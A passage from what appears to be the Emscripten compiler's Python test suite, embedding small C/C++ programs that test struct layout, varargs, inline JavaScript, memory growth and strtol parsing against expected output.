int main( int argc, const char *argv[] ) {
int before = 70;
IUB iub[] = {
{ 'a', 0.3029549426680, 5 },
{ 'c', 0.15, 4 },
{ 'g', 0.12, 3 },
{ 't', 0.27, 2 },
};
int after = 90;
printf("*%d,%d,%d,%d,%d,%d*\\n", before, iub[0].c, int(iub[1].p*100), iub[2].pi, int(iub[0].p*10000), after);
return 0;
}
'''
self.do_run(src, '*70,97,15,3,3029,90*')
def test_bigarray(self):
if self.emcc_args is None: return self.skip('need ta2 to compress type data on zeroinitializers')
# avoid "array initializer too large" errors
src = r'''
#include <stdio.h>
#include <assert.h>
#define SIZE (1024*100)
struct Struct {
char x;
int y;
};
Struct buffy[SIZE];
int main() {
for (int i = 0; i < SIZE; i++) { assert(buffy[i].x == 0 && buffy[i].y == 0); } // we were zeroinitialized
for (int i = 0; i < SIZE; i++) { buffy[i].x = i*i; buffy[i].y = i*i*i; } // we can save data
printf("*%d*\n", buffy[SIZE/3].x);
return 0;
}
'''
self.do_run(src, '*57*')
def test_mod_globalstruct(self):
src = '''
#include <stdio.h>
struct malloc_params {
size_t magic, page_size;
};
malloc_params mparams;
#define SIZE_T_ONE ((size_t)1)
#define page_align(S) (((S) + (mparams.page_size - SIZE_T_ONE)) & ~(mparams.page_size - SIZE_T_ONE))
int main()
{
mparams.page_size = 4096;
printf("*%d,%d,%d,%d*\\n", mparams.page_size, page_align(1000), page_align(6000), page_align(66474));
return 0;
}
'''
self.do_run(src, '*4096,4096,8192,69632*')
def test_pystruct(self):
src = '''
#include <stdio.h>
// Based on CPython code
union PyGC_Head {
struct {
union PyGC_Head *gc_next;
union PyGC_Head *gc_prev;
size_t gc_refs;
} gc;
long double dummy; /* force worst-case alignment */
} ;
struct gc_generation {
PyGC_Head head;
int threshold; /* collection threshold */
int count; /* count of allocations or collections of younger
generations */
};
#define NUM_GENERATIONS 3
#define GEN_HEAD(n) (&generations[n].head)
/* linked lists of container objects */
static struct gc_generation generations[NUM_GENERATIONS] = {
/* PyGC_Head, threshold, count */
{{{GEN_HEAD(0), GEN_HEAD(0), 0}}, 700, 0},
{{{GEN_HEAD(1), GEN_HEAD(1), 0}}, 10, 0},
{{{GEN_HEAD(2), GEN_HEAD(2), 0}}, 10, 0},
};
int main()
{
gc_generation *n = NULL;
printf("*%d,%d,%d,%d,%d,%d,%d,%d*\\n",
(int)(&n[0]),
(int)(&n[0].head),
(int)(&n[0].head.gc.gc_next),
(int)(&n[0].head.gc.gc_prev),
(int)(&n[0].head.gc.gc_refs),
(int)(&n[0].threshold), (int)(&n[0].count), (int)(&n[1])
);
printf("*%d,%d,%d*\\n",
(int)(&generations[0]) ==
(int)(&generations[0].head.gc.gc_next),
(int)(&generations[0]) ==
(int)(&generations[0].head.gc.gc_prev),
(int)(&generations[0]) ==
(int)(&generations[1])
);
int x1 = (int)(&generations[0]);
int x2 = (int)(&generations[1]);
printf("*%d*\\n", x1 == x2);
for (int i = 0; i < NUM_GENERATIONS; i++) {
PyGC_Head *list = GEN_HEAD(i);
printf("%d:%d,%d\\n", i, (int)list == (int)(list->gc.gc_prev), (int)list ==(int)(list->gc.gc_next));
}
printf("*%d,%d,%d*\\n", sizeof(PyGC_Head), sizeof(gc_generation), int(GEN_HEAD(2)) - int(GEN_HEAD(1)));
}
'''
if Settings.QUANTUM_SIZE == 1:
# Compressed memory. Note that sizeof() does give the fat sizes, however!
self.do_run(src, '*0,0,0,1,2,3,4,5*\n*1,0,0*\n*0*\n0:1,1\n1:1,1\n2:1,1\n*12,20,5*')
else:
if self.is_le32():
self.do_run(src, '*0,0,0,4,8,16,20,24*\n*1,0,0*\n*0*\n0:1,1\n1:1,1\n2:1,1\n*16,24,24*')
else:
self.do_run(src, '*0,0,0,4,8,12,16,20*\n*1,0,0*\n*0*\n0:1,1\n1:1,1\n2:1,1\n*12,20,20*')
def test_ptrtoint(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = '''
#include <stdio.h>
int main( int argc, const char *argv[] ) {
char *a = new char[10];
char *a0 = a+0;
char *a5 = a+5;
int *b = new int[10];
int *b0 = b+0;
int *b5 = b+5;
int c = (int)b5-(int)b0; // Emscripten should warn!
int d = (int)b5-(int)b0; // Emscripten should warn!
printf("*%d*\\n", (int)a5-(int)a0);
return 0;
}
'''
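# The two pointer-difference lines above should each trigger compiler warnings;
# we expect four 'Warning' lines in the compiler output in total.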
runner = self
def check_warnings(output):
runner.assertEquals(len([line for line in output.split('\n') if 'Warning' in line]), 4)
self.do_run(src, '*5*', output_processor=check_warnings)
def test_sizeof(self):
if self.emcc_args is None: return self.skip('requires emcc')
# Has invalid writes between printouts
Settings.SAFE_HEAP = 0
src = '''
#include <stdio.h>
#include <string.h>
#include "emscripten.h"
struct A { int x, y; };
int main( int argc, const char *argv[] ) {
int *a = new int[10];
int *b = new int[1];
int *c = new int[10];
for (int i = 0; i < 10; i++)
a[i] = 2;
*b = 5;
for (int i = 0; i < 10; i++)
c[i] = 8;
printf("*%d,%d,%d,%d,%d*\\n", a[0], a[9], *b, c[0], c[9]);
// Should overwrite a, but not touch b!
memcpy(a, c, 10*sizeof(int));
printf("*%d,%d,%d,%d,%d*\\n", a[0], a[9], *b, c[0], c[9]);
// Part 2
A as[3] = { { 5, 12 }, { 6, 990 }, { 7, 2 } };
memcpy(&as[0], &as[2], sizeof(A));
printf("*%d,%d,%d,%d,%d,%d*\\n", as[0].x, as[0].y, as[1].x, as[1].y, as[2].x, as[2].y);
return 0;
}
'''
self.do_run(src, '*2,2,5,8,8***8,8,5,8,8***7,2,6,990,7,2*', [], lambda x, err: x.replace('\n', '*'))
def test_float_h(self):
process = Popen([PYTHON, EMCC, path_from_root('tests', 'float+.c')], stdout=PIPE, stderr=PIPE)
process.communicate()
assert process.returncode == 0, 'float.h should agree with our system'
def test_emscripten_api(self):
#if Settings.MICRO_OPTS or Settings.RELOOP or Building.LLVM_OPTS: return self.skip('FIXME')
src = r'''
#include <stdio.h>
#include "emscripten.h"
extern "C" {
void save_me_aimee() { printf("mann\n"); }
}
int main() {
// EMSCRIPTEN_COMMENT("hello from the source");
emscripten_run_script("Module.print('hello world' + '!')");
printf("*%d*\n", emscripten_run_script_int("5*20"));
printf("*%s*\n", emscripten_run_script_string("'five'+'six'"));
emscripten_run_script("Module['_save_me_aimee']()");
return 0;
}
'''
check = '''
def process(filename):
src = open(filename, 'r').read()
# TODO: restore this (see comment in emscripten.h) assert '// hello from the source' in src
'''
Settings.EXPORTED_FUNCTIONS = ['_main', '_save_me_aimee']
self.do_run(src, 'hello world!\n*100*\n*fivesix*\nmann\n', post_build=check)
def test_inlinejs(self):
if Settings.ASM_JS: return self.skip('asm does not support random code, TODO: something that works in asm')
src = r'''
#include <stdio.h>
double get() {
double ret = 0;
__asm __volatile__("Math.abs(-12/3.3)":"=r"(ret)); // write to a variable
return ret;
}
int main() {
asm("Module.print('Inline JS is very cool')");
printf("%.2f\n", get());
return 0;
}
'''
self.do_run(src, 'Inline JS is very cool\n3.64')
def zzztest_inlinejs2(self):
if Settings.ASM_JS: return self.skip('asm does not support random code, TODO: something that works in asm')
src = r'''
#include <stdio.h>
double get() {
double ret = 0;
__asm __volatile__("Math.abs(-12/3.3)":"=r"(ret)); // write to a variable
return ret;
}
int mix(int x, int y) {
int ret;
asm("Math.pow(2, %0+%1+1)" : "=r"(ret) : "r"(x), "r"(y)); // read and write
return ret;
}
void mult() {
asm("var $_$1 = Math.abs(-100); $_$1 *= 2;"); // multiline
asm __volatile__("Module.print($_$1); Module.print('\n')");
}
int main(int argc, char **argv) {
asm("Module.print('Inline JS is very cool')");
printf("%.2f\n", get());
printf("%d\n", mix(argc, argc/2));
mult();
return 0;
}
'''
self.do_run(src, 'Inline JS is very cool\n3.64\nwaka\nzakai\n')
def test_memorygrowth(self):
if Settings.USE_TYPED_ARRAYS == 0: return self.skip('memory growth is only supported with typed arrays')
if Settings.ASM_JS: return self.skip('asm does not support memory growth yet')
# With typed arrays in particular, it is dangerous to use more memory than TOTAL_MEMORY,
# since we then need to enlarge the heap(s).
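# Plan: run once without ALLOW_MEMORY_GROWTH and expect the enlarge-memory abort,
# then run again with growth enabled and expect success; finally compare the two
# generated builds to confirm the growth-enabled code is less optimized.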
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include "emscripten.h"
int main(int argc, char **argv)
{
char *buf1 = (char*)malloc(100);
char *data1 = "hello";
memcpy(buf1, data1, strlen(data1)+1);
float *buf2 = (float*)malloc(100);
float pie = 4.955;
memcpy(buf2, &pie, sizeof(float));
printf("*pre: %s,%.3f*\n", buf1, buf2[0]);
int totalMemory = emscripten_run_script_int("TOTAL_MEMORY");
char *buf3 = (char*)malloc(totalMemory+1);
buf3[argc] = (int)buf2;
if (argc % 7 == 6) printf("%d\n", memcpy(buf3, buf1, argc));
char *buf4 = (char*)malloc(100);
float *buf5 = (float*)malloc(100);
//printf("totalMemory: %d bufs: %d,%d,%d,%d,%d\n", totalMemory, buf1, buf2, buf3, buf4, buf5);
assert((int)buf4 > (int)totalMemory && (int)buf5 > (int)totalMemory);
printf("*%s,%.3f*\n", buf1, buf2[0]); // the old heap data should still be there
memcpy(buf4, buf1, strlen(data1)+1);
memcpy(buf5, buf2, sizeof(float));
printf("*%s,%.3f*\n", buf4, buf5[0]); // and the new heap space should work too
return 0;
}
'''
# Fail without memory growth
self.do_run(src, 'Cannot enlarge memory arrays.')
fail = open('src.cpp.o.js').read()
# Win with it
Settings.ALLOW_MEMORY_GROWTH = 1
self.do_run(src, '*pre: hello,4.955*\n*hello,4.955*\n*hello,4.955*')
win = open('src.cpp.o.js').read()
if self.emcc_args and '-O2' in self.emcc_args:
# Make sure ALLOW_MEMORY_GROWTH generates different code (should be less optimized)
code_start = 'var TOTAL_MEMORY = '
fail = fail[fail.find(code_start):]
win = win[win.find(code_start):]
assert len(fail) < len(win), 'failing code - without memory growth on - is more optimized, and smaller'
def test_ssr(self): # struct self-ref
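# Statically initializes a struct array whose members point back into the same
# array (as in openjpeg's MQ-coder state table); checks the resulting offsets.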
src = '''
#include <stdio.h>
// see related things in openjpeg
typedef struct opj_mqc_state {
unsigned int qeval;
int mps;
struct opj_mqc_state *nmps;
struct opj_mqc_state *nlps;
} opj_mqc_state_t;
static opj_mqc_state_t mqc_states[2] = {
{0x5600, 0, &mqc_states[2], &mqc_states[3]},
{0x5602, 1, &mqc_states[3], &mqc_states[2]},
};
int main() {
printf("*%d*\\n", (int)(mqc_states+1)-(int)mqc_states);
for (int i = 0; i < 2; i++)
printf("%d:%d,%d,%d,%d\\n", i, mqc_states[i].qeval, mqc_states[i].mps,
(int)mqc_states[i].nmps-(int)mqc_states, (int)mqc_states[i].nlps-(int)mqc_states);
return 0;
}
'''
if Settings.QUANTUM_SIZE == 1:
self.do_run(src, '''*4*\n0:22016,0,8,12\n1:22018,1,12,8\n''')
else:
self.do_run(src, '''*16*\n0:22016,0,32,48\n1:22018,1,48,32\n''')
def test_tinyfuncstr(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = '''
#include <stdio.h>
struct Class {
static char *name1() { return "nameA"; }
char *name2() { return "nameB"; }
};
int main() {
printf("*%s,%s*\\n", Class::name1(), (new Class())->name2());
return 0;
}
'''
self.do_run(src, '*nameA,nameB*')
def test_llvmswitch(self):
Settings.CORRECT_SIGNS = 1
src = '''
#include <stdio.h>
#include <string.h>
int switcher(int p)
{
switch(p) {
case 'a':
case 'b':
case 'c':
return p-1;
case -15:
return p+1;
}
return p;
}
int main( int argc, const char *argv[] ) {
unsigned int x = 0xfffffff1;
x >>= (argc-1); // force it to be unsigned for purpose of checking our switch comparison in signed/unsigned
printf("*%d,%d,%d,%d,%d,%d*\\n", switcher('a'), switcher('b'), switcher('c'), switcher(x), switcher(-15), switcher('e'));
return 0;
}
'''
self.do_run(src, '*96,97,98,-14,-14,101*')
# By default, when the user has not specified a -std flag, Emscripten should always build .cpp files using the C++03 standard,
# i.e. as if "-std=c++03" had been passed on the command line. On Linux with Clang 3.2 this is the case, but on Windows
# with Clang 3.2, -std=c++11 was chosen as the default, per this rationale:
# < jrose> clb: it's deliberate, with the idea that for people who don't care about the standard, they should be using the "best" thing we can offer on that platform
def test_cxx03_do_run(self):
src = '''
#include <stdio.h>
#if __cplusplus != 199711L
#error By default, if no -std is specified, emscripten should be compiling with -std=c++03!
#endif
int main( int argc, const char *argv[] ) {
printf("Hello world!\\n");
return 0;
}
'''
self.do_run(src, 'Hello world!')
def test_bigswitch(self):
if Settings.RELOOP: return self.skip('TODO: switch in relooper, issue #781')
if Settings.ASM_JS: return self.skip('TODO: switch too large for asm')
src = open(path_from_root('tests', 'bigswitch.cpp')).read()
self.do_run(src, '''34962: GL_ARRAY_BUFFER (0x8892)
26214: what?
35040: GL_STREAM_DRAW (0x88E0)
''', args=['34962', '26214', '35040'])
def test_indirectbr(self):
Building.COMPILER_TEST_OPTS = filter(lambda x: x != '-g', Building.COMPILER_TEST_OPTS)
src = '''
#include <stdio.h>
int main(void) {
const void *addrs[2] = { &&FOO, &&BAR };
// confuse the optimizer so it doesn't hardcode the jump and avoid generating an |indirectbr| instruction
int which = 0;
for (int x = 0; x < 1000; x++) which = (which + x*x) % 7;
which = (which % 2) + 1;
goto *addrs[which];
FOO:
printf("bad\\n");
return 0;
BAR:
printf("good\\n");
const void *addr = &&FOO;
goto *addr;
}
'''
self.do_run(src, 'good\nbad')
def test_indirectbr_many(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('blockaddr > 255 requires ta2')
blocks = range(1500)
init = ', '.join(['&&B%d' % b for b in blocks])
defs = '\n'.join(['B%d: printf("%d\\n"); return 0;' % (b,b) for b in blocks])
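# With argc == 1 the computed index is argc*argc + 1000 == 1001, so B1001 should print.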
src = '''
#include <stdio.h>
int main(int argc, char **argv) {
printf("\\n");
const void *addrs[] = { %s };
goto *addrs[argc*argc + 1000];
%s
return 0;
}
''' % (init, defs)
self.do_run(src, '\n1001\n')
def test_pack(self):
src = '''
#include <stdio.h>
#include <string.h>
#pragma pack(push,1)
typedef struct header
{
unsigned char id;
unsigned short colour;
unsigned char desc;
} header;
#pragma pack(pop)
typedef struct fatheader
{
unsigned char id;
unsigned short colour;
unsigned char desc;
} fatheader;
int main( int argc, const char *argv[] ) {
header h, *ph = 0;
fatheader fh, *pfh = 0;
printf("*%d,%d,%d*\\n", sizeof(header), (int)((int)&h.desc - (int)&h.id), (int)(&ph[1])-(int)(&ph[0]));
printf("*%d,%d,%d*\\n", sizeof(fatheader), (int)((int)&fh.desc - (int)&fh.id), (int)(&pfh[1])-(int)(&pfh[0]));
return 0;
}
'''
if Settings.QUANTUM_SIZE == 1:
self.do_run(src, '*4,2,3*\n*6,2,3*')
else:
self.do_run(src, '*4,3,4*\n*6,4,6*')
def test_varargs(self):
if Settings.QUANTUM_SIZE == 1: return self.skip('FIXME: Add support for this')
if not self.is_le32(): return self.skip('we do not support all varargs stuff without le32')
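# Covers basic va_list use, va_copy, list reuse after va_end/va_start, and
# calling a varargs function through a function pointer.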
src = '''
#include <stdio.h>
#include <stdarg.h>
void vary(const char *s, ...)
{
va_list v;
va_start(v, s);
char d[20];
vsnprintf(d, 20, s, v);
puts(d);
// Try it with copying
va_list tempva;
va_copy(tempva, v);
vsnprintf(d, 20, s, tempva);
puts(d);
va_end(v);
}
void vary2(char color, const char *s, ...)
{
va_list v;
va_start(v, s);
char d[21];
d[0] = color;
vsnprintf(d+1, 20, s, v);
puts(d);
va_end(v);
}
void varargs_listoffsets_list_evaluate(int count, va_list ap, int vaIteration)
{
while(count > 0)
{
const char* string = va_arg(ap, const char*);
printf("%s", string);
count--;
}
printf("\\n");
}
void varags_listoffsets_list_copy(int count, va_list ap, int iteration)
{
va_list ap_copy;
va_copy(ap_copy, ap);
varargs_listoffsets_list_evaluate(count, ap_copy, iteration);
va_end(ap_copy);
}
void varargs_listoffsets_args(int type, int count, ...)
{
va_list ap;
va_start(ap, count);
// evaluate a copied list
varags_listoffsets_list_copy(count, ap, 1);
varags_listoffsets_list_copy(count, ap, 2);
varags_listoffsets_list_copy(count, ap, 3);
varags_listoffsets_list_copy(count, ap, 4);
varargs_listoffsets_list_evaluate(count, ap, 1);
// NOTE: we expect this test to fail, so we will check the stdout for <BAD+0><BAD+1>.....
varargs_listoffsets_list_evaluate(count, ap, 2);
// NOTE: this test has to work again, as we restart the list
va_end(ap);
va_start(ap, count);
varargs_listoffsets_list_evaluate(count, ap, 3);
va_end(ap);
}
void varargs_listoffsets_main()
{
varargs_listoffsets_args(0, 5, "abc", "def", "ghi", "jkl", "mno", "<BAD+0>", "<BAD+1>", "<BAD+2>", "<BAD+3>", "<BAD+4>", "<BAD+5>", "<BAD+6>", "<BAD+7>", "<BAD+8>", "<BAD+9>", "<BAD+10>", "<BAD+11>", "<BAD+12>", "<BAD+13>", "<BAD+14>", "<BAD+15>", "<BAD+16>");
}
#define GETMAX(pref, type) \
type getMax##pref(int num, ...) \
{ \
va_list vv; \
va_start(vv, num); \
type maxx = va_arg(vv, type); \
for (int i = 1; i < num; i++) \
{ \
type curr = va_arg(vv, type); \
maxx = curr > maxx ? curr : maxx; \
} \
va_end(vv); \
return maxx; \
}
GETMAX(i, int);
GETMAX(D, double);
int main(int argc, char **argv) {
vary("*cheez: %d+%d*", 0, 24); // Also tests that '0' is not special as an array ender
vary("*albeit*"); // Should not fail with no var args in vararg function
vary2('Q', "%d*", 85);
int maxxi = getMaxi(6, 2, 5, 21, 4, -10, 19);
printf("maxxi:%d*\\n", maxxi);
double maxxD = getMaxD(6, (double)2.1, (double)5.1, (double)22.1, (double)4.1, (double)-10.1, (double)19.1, (double)2);
printf("maxxD:%.2f*\\n", (float)maxxD);
// And, as a function pointer
void (*vfp)(const char *s, ...) = argc == 1211 ? NULL : vary;
vfp("*vfp:%d,%d*", 22, 199);
// ensure lists work properly when copied, reinited etc.
varargs_listoffsets_main();
return 0;
}
'''
self.do_run(src, '*cheez: 0+24*\n*cheez: 0+24*\n*albeit*\n*albeit*\nQ85*\nmaxxi:21*\nmaxxD:22.10*\n*vfp:22,199*\n*vfp:22,199*\n'+
'abcdefghijklmno\nabcdefghijklmno\nabcdefghijklmno\nabcdefghijklmno\nabcdefghijklmno\n<BAD+0><BAD+1><BAD+2><BAD+3><BAD+4>\nabcdefghijklmno\n')
def test_varargs_byval(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('FIXME: Add support for this')
if self.is_le32(): return self.skip('clang cannot compile this code with that target yet')
src = r'''
#include <stdio.h>
#include <stdarg.h>
typedef struct type_a {
union {
double f;
void *p;
int i;
short sym;
} value;
} type_a;
enum mrb_vtype {
MRB_TT_FALSE = 0, /* 0 */
MRB_TT_CLASS = 9 /* 9 */
};
typedef struct type_b {
enum mrb_vtype tt:8;
} type_b;
void print_type_a(int argc, ...);
void print_type_b(int argc, ...);
int main(int argc, char *argv[])
{
type_a a;
type_b b;
a.value.p = (void*) 0x12345678;
b.tt = MRB_TT_CLASS;
printf("The original address of a is: %p\n", a.value.p);
printf("The original type of b is: %d\n", b.tt);
print_type_a(1, a);
print_type_b(1, b);
return 0;
}
void print_type_a(int argc, ...) {
va_list ap;
type_a a;
va_start(ap, argc);
a = va_arg(ap, type_a);
va_end(ap);
printf("The current address of a is: %p\n", a.value.p);
}
void print_type_b(int argc, ...) {
va_list ap;
type_b b;
va_start(ap, argc);
b = va_arg(ap, type_b);
va_end(ap);
printf("The current type of b is: %d\n", b.tt);
}
'''
self.do_run(src, '''The original address of a is: 0x12345678
The original type of b is: 9
The current address of a is: 0x12345678
The current type of b is: 9
''')
def test_structbyval(self):
Settings.INLINING_LIMIT = 50
# part 1: make sure that normally, passing structs by value works
src = r'''
#include <stdio.h>
struct point
{
int x, y;
};
void dump(struct point p) {
p.x++; // should not modify
p.y++; // anything in the caller!
printf("dump: %d,%d\n", p.x, p.y);
}
void dumpmod(struct point *p) {
p->x++; // should not modify
p->y++; // anything in the caller!
printf("dump: %d,%d\n", p->x, p->y);
}
int main( int argc, const char *argv[] ) {
point p = { 54, 2 };
printf("pre: %d,%d\n", p.x, p.y);
dump(p);
void (*dp)(point p) = dump; // And, as a function pointer
dp(p);
printf("post: %d,%d\n", p.x, p.y);
dumpmod(&p);
dumpmod(&p);
printf("last: %d,%d\n", p.x, p.y);
return 0;
}
'''
self.do_run(src, 'pre: 54,2\ndump: 55,3\ndump: 55,3\npost: 54,2\ndump: 55,3\ndump: 56,4\nlast: 56,4')
# Check for lack of warning in the generated code (they should appear in part 2)
generated = open(os.path.join(self.get_dir(), 'src.cpp.o.js')).read()
assert 'Casting a function pointer type to another with a different number of arguments.' not in generated, 'Unexpected warning'
# part 2: make sure we warn about mixing C and C++ calling conventions here
if not (self.emcc_args is None or self.emcc_args == []): return # Optimized code is missing the warning comments
header = r'''
struct point
{
int x, y;
};
'''
open(os.path.join(self.get_dir(), 'header.h'), 'w').write(header)
supp = r'''
#include <stdio.h>
#include "header.h"
void dump(struct point p) {
p.x++; // should not modify
p.y++; // anything in the caller!
printf("dump: %d,%d\n", p.x, p.y);
}
'''
supp_name = os.path.join(self.get_dir(), 'supp.c')
open(supp_name, 'w').write(supp)
main = r'''
#include <stdio.h>
#include "header.h"
#ifdef __cplusplus
extern "C" {
#endif
void dump(struct point p);
#ifdef __cplusplus
}
#endif
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
printf("pre: %d,%d\n", p.x, p.y);
dump(p);
void (*dp)(struct point p) = dump; // And, as a function pointer
dp(p);
printf("post: %d,%d\n", p.x, p.y);
return 0;
}
'''
main_name = os.path.join(self.get_dir(), 'main.cpp')
open(main_name, 'w').write(main)
Building.emcc(supp_name)
Building.emcc(main_name)
all_name = os.path.join(self.get_dir(), 'all.bc')
Building.link([supp_name + '.o', main_name + '.o'], all_name)
# This will fail! See explanation near the warning we check for, in the compiler source code
output = Popen([PYTHON, EMCC, all_name], stderr=PIPE).communicate()
# Check for warning in the generated code
generated = open(os.path.join(self.get_dir(), 'src.cpp.o.js')).read()
if 'i386-pc-linux-gnu' in COMPILER_OPTS:
assert 'Casting a function pointer type to a potentially incompatible one' in output[1], 'Missing expected warning'
else:
print >> sys.stderr, 'skipping C/C++ conventions warning check, since not i386-pc-linux-gnu'
def test_stdlibs(self):
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.USE_TYPED_ARRAYS == 2:
# Typed arrays = 2 + safe heap prints a warning that messes up our output.
Settings.SAFE_HEAP = 0
src = '''
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
void clean()
{
printf("*cleaned*\\n");
}
int comparer(const void *a, const void *b) {
int aa = *((int*)a);
int bb = *((int*)b);
return aa - bb;
}
int main() {
// timeofday
timeval t;
gettimeofday(&t, NULL);
printf("*%d,%d\\n", int(t.tv_sec), int(t.tv_usec)); // should not crash
// atexit
atexit(clean);
// qsort
int values[6] = { 3, 2, 5, 1, 5, 6 };
qsort(values, 5, sizeof(int), comparer);
printf("*%d,%d,%d,%d,%d,%d*\\n", values[0], values[1], values[2], values[3], values[4], values[5]);
printf("*stdin==0:%d*\\n", stdin == 0); // check that external values are at least not NULL
printf("*%%*\\n");
printf("*%.1ld*\\n", 5);
printf("*%.1f*\\n", strtod("66", NULL)); // checks dependency system, as our strtod needs _isspace etc.
printf("*%ld*\\n", strtol("10", NULL, 0));
printf("*%ld*\\n", strtol("0", NULL, 0));
printf("*%ld*\\n", strtol("-10", NULL, 0));
printf("*%ld*\\n", strtol("12", NULL, 16));
printf("*%lu*\\n", strtoul("10", NULL, 0));
printf("*%lu*\\n", strtoul("0", NULL, 0));
printf("*%lu*\\n", strtoul("-10", NULL, 0));
printf("*malloc(0)!=0:%d*\\n", malloc(0) != 0); // We should not fail horribly
return 0;
}
'''
self.do_run(src, '*1,2,3,5,5,6*\n*stdin==0:0*\n*%*\n*5*\n*66.0*\n*10*\n*0*\n*-10*\n*18*\n*10*\n*0*\n*4294967286*\n*malloc(0)!=0:1*\n*cleaned*')
src = r'''
#include <stdio.h>
#include <stdbool.h>
int main() {
bool x = true;
bool y = false;
printf("*%d*\n", x != y);
return 0;
}
'''
self.do_run(src, '*1*', force_c=True)
def test_strtoll_hex(self):
if self.emcc_args is None: return self.skip('requires emcc')
# tests strtoll for hex strings (0x...)
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "0x4 -0x3A +0xDEADBEEF";
char *end_char;
// undefined base
long long int l1 = strtoll(STRING, &end_char, 0);
long long int l2 = strtoll(end_char, &end_char, 0);
long long int l3 = strtoll(end_char, NULL, 0);
// defined base
long long int l4 = strtoll(STRING, &end_char, 16);
long long int l5 = strtoll(end_char, &end_char, 16);
long long int l6 = strtoll(end_char, NULL, 16);
printf("%d%d%d%d%d%d\n", l1==0x4, l2==-0x3a, l3==0xdeadbeef, l4==0x4, l5==-0x3a, l6==0xdeadbeef);
return 0;
}
'''
self.do_run(src, '111111')
def test_strtoll_dec(self):
if self.emcc_args is None: return self.skip('requires emcc')
# tests strtoll for decimal strings
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "4 -38 +4711";
char *end_char;
// undefined base
long long int l1 = strtoll(STRING, &end_char, 0);
long long int l2 = strtoll(end_char, &end_char, 0);
long long int l3 = strtoll(end_char, NULL, 0);
// defined base
long long int l4 = strtoll(STRING, &end_char, 10);
long long int l5 = strtoll(end_char, &end_char, 10);
long long int l6 = strtoll(end_char, NULL, 10);
printf("%d%d%d%d%d%d\n", l1==4, l2==-38, l3==4711, l4==4, l5==-38, l6==4711);
return 0;
}
'''
self.do_run(src, '111111')
def test_strtoll_bin(self):
if self.emcc_args is None: return self.skip('requires emcc')
# tests strtoll for binary strings
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "1 -101 +1011";
char *end_char;
// defined base
long long int l4 = strtoll(STRING, &end_char, 2);
long long int l5 = strtoll(end_char, &end_char, 2);
long long int l6 = strtoll(end_char, NULL, 2);
printf("%d%d%d\n", l4==1, l5==-5, l6==11);
return 0;
}
'''
self.do_run(src, '111')
def test_strtoll_oct(self):
if self.emcc_args is None: return self.skip('requires emcc')
# tests strtoll for octal strings (0...)
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "0 -035 +04711";
char *end_char;
// undefined base
long long int l1 = strtoll(STRING, &end_char, 0);
long long int l2 = strtoll(end_char, &end_char, 0);
long long int l3 = strtoll(end_char, NULL, 0);
// defined base
long long int l4 = strtoll(STRING, &end_char, 8);
long long int l5 = strtoll(end_char, &end_char, 8);
long long int l6 = strtoll(end_char, NULL, 8);
printf("%d%d%d%d%d%d\n", l1==0, l2==-29, l3==2505, l4==0, l5==-29, l6==2505);
return 0;
}
'''
self.do_run(src, '111111')
def test_strtol_hex(self):
# tests strtol for hex strings (0x...)
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "0x4 -0x3A +0xDEAD";
char *end_char;
// undefined base
long l1 = strtol(STRING, &end_char, 0);
long l2 = strtol(end_char, &end_char, 0);
long l3 = strtol(end_char, NULL, 0);
// defined base
long l4 = strtol(STRING, &end_char, 16);
long l5 = strtol(end_char, &end_char, 16);
long l6 = strtol(end_char, NULL, 16);
printf("%d%d%d%d%d%d\n", l1==0x4, l2==-0x3a, l3==0xdead, l4==0x4, l5==-0x3a, l6==0xdead);
return 0;
}
'''
self.do_run(src, '111111')
def test_strtol_dec(self):
# tests strtol for decimal strings
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "4 -38 +4711";
char *end_char;
// undefined base
long l1 = strtol(STRING, &end_char, 0);
long l2 = strtol(end_char, &end_char, 0);
long l3 = strtol(end_char, NULL, 0);
// defined base
long l4 = strtol(STRING, &end_char, 10);
long l5 = strtol(end_char, &end_char, 10);
long l6 = strtol(end_char, NULL, 10);
printf("%d%d%d%d%d%d\n", l1==4, l2==-38, l3==4711, l4==4, l5==-38, l6==4711);
return 0;
}
'''
self.do_run(src, '111111')
def test_strtol_bin(self):
# tests strtol for binary strings
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "1 -101 +1011";
char *end_char;
// defined base
long l4 = strtol(STRING, &end_char, 2);
long l5 = strtol(end_char, &end_char, 2);
long l6 = strtol(end_char, NULL, 2);
printf("%d%d%d\n", l4==1, l5==-5, l6==11);
return 0;
}
'''
self.do_run(src, '111')
def test_strtol_oct(self):
# tests strtol for octal strings (0...)
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *STRING = "0 -035 +04711";
char *end_char;
// undefined base
long l1 = strtol(STRING, &end_char, 0);
long l2 = strtol(end_char, &end_char, 0);
long l3 = strtol(end_char, NULL, 0);
// defined base
long l4 = strtol(STRING, &end_char, 8);
long l5 = strtol(end_char, &end_char, 8);
long l6 = strtol(end_char, NULL, 8);
printf("%d%d%d%d%d%d\n", l1==0, l2==-29, l3==2505, l4==0, l5==-29, l6==2505);
return 0;
}
'''
self.do_run(src, '111111')
def test_atexit(self):
# Confirms they are called in reverse order
src = r'''
#include <stdio.h>
#include <stdlib.h>
static void cleanA() {
printf("A");
}
static void cleanB() {
printf("B");
}
int main() {
atexit(cleanA);
atexit(cleanB);
return 0;
}
'''
self.do_run(src, 'BA')
def test_time(self):
# XXX Not sure what the right output is here. Looks like the test started failing with daylight savings changes. Modified it to pass again.
src = open(path_from_root('tests', 'time', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'time', 'output.txt'), 'r').read()
expected2 = open(path_from_root('tests', 'time', 'output2.txt'), 'r').read()
self.do_run(src, [expected, expected2],
extra_emscripten_args=['-H', 'libc/time.h'])
